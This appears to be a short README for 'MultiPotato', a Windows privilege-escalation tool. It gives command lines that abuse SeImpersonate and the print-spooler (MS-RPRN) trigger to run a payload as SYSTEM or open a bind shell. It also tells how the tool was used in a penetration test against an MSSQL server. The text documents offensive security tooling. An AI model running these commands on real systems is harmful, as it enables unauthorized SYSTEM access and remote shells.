MultiPotato – Another Potato to get SYSTEM via SeImpersonate privileges
First of all – credit to
- CreateProcessAsUserW with SpoolSample trigger:
c:tempMultiPotato> MultiPotato.exe -t CreateProcessAsUserW -p "pwnedpipespoolss" -e "C:tempstage2.exe"
And trigger it via
c:tempMultiPotato>MS-RPRN.exe \192.168.100.150 \192.168.100.150/pipe/pwned
Important: In my testings for MS-RPRN I could not use localhost or 127.0.0.1 as target, this has to be the network IP-Adress or FQDN. In addition the Printer Service needs to be enabled for this to work.
- BindShell with SpoolSample PipeName
c:tempMultiPotato> MultiPotato.exe -t BindShell -p "pwnedpipespoolss"
Why??
I recently had a penetrationtest, where I was able to pwn a MSSQL Server via SQL-Injection and XP_CMDShell. But all public Potatoes failed on this target system to elevate privileges from service-account to SYSTEM. The System auth trigger was not the problem – instead CreateProcessWithTokenW
failed all the time with NTSTATUS Code 5 – access forbidden. This didn’t really makes sense for me and may be an edge case. One reason for that could be
the local endpoint protection which may have blocked the process creation after impersonating SYSTEM.
Therefore I searched for alternatives – and asked some people on Twitter about it. Again Credit to @splinter_code for explaining me how to do it via CreateProcessAsUserW
which worked fine on the pwned MSSQL server to get a SYSTEM C2-Callback.
If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.